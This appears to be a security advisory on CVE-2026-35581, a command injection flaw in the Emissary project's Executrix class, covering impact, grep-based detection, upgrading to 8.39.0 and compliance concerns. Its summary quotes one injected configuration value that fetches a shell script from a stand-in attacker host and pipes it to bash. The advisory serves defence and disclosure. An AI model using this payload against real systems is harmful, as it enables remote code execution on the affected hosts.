Executive Summary

CVE-2026-35581 is a command injection vulnerability in the Executrix utility class of the Emissary project affecting versions up to 8.38.0. The vulnerability occurs because the PLACE_NAME configuration parameter is sanitized inadequately: only spaces are replaced with underscores, while dangerous shell metacharacters such as ;, |, $, `, (, ), and others remain intact.

This insufficient sanitization allows an attacker who can control the PLACE_NAME value to inject arbitrary shell commands into the shell command executed by /bin/sh -c. For example, a malicious PLACE_NAME like "test;curl attacker.com/shell.sh|bash;x" would still contain semicolons and pipes after sanitization, enabling execution of arbitrary commands on the host.

The vulnerability was fixed in version 8.39.0 by replacing the simplistic space-only replacement with a regex-based allowlist that replaces all characters not matching [a-zA-Z0-9_-] with underscores, preventing injection of shell metacharacters.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability allows an attacker with the ability to control configuration values (such as administrative access or a compromised configuration source) to execute arbitrary shell commands on the Emissary host.

The impact is high severity, potentially leading to full compromise of the system, including unauthorized access, data manipulation, and disruption of services.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by inspecting the PLACE_NAME configuration parameter used by the Emissary Executrix utility class for the presence of shell metacharacters such as ;, |, $, `, (, ), and others that are not properly sanitized.

Administrators can check configuration files for PLACE_NAME values containing suspicious characters that could lead to command injection.

A practical detection approach is to search for PLACE_NAME entries with unsafe characters using commands like:

• grep -E '[;|$`()]' /path/to/emissary/configuration/files
• grep -r PLACE_NAME /path/to/emissary/configuration | grep -E '[;|$`()]'

Additionally, monitoring for unusual shell command executions or network connections initiated by the Emissary process may help detect exploitation attempts.

Useful 0 Not Useful 0

Mitigation Strategies

The primary mitigation is to upgrade Emissary to version 8.39.0 or later, where the vulnerability is fixed by proper sanitization of the PLACE_NAME parameter.

If upgrading is not immediately possible, administrators should ensure that all PLACE_NAME values in configuration files contain only alphanumeric characters, underscores, and hyphens, avoiding any shell metacharacters.

This can be enforced by manually reviewing and sanitizing configuration files or by implementing validation scripts to reject unsafe PLACE_NAME values.

Useful 0 Not Useful 0

Compliance Impact

The vulnerability allows high severity arbitrary command execution on the Emissary host, which can lead to unauthorized access, data manipulation, and potential data breaches.

Such security weaknesses can impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of sensitive data and secure system configurations to prevent unauthorized access and data compromise.

Specifically, the ability for an attacker with configuration control to execute arbitrary commands could lead to confidentiality, integrity, and availability violations, all of which are critical concerns under these regulations.

Useful 0 Not Useful 0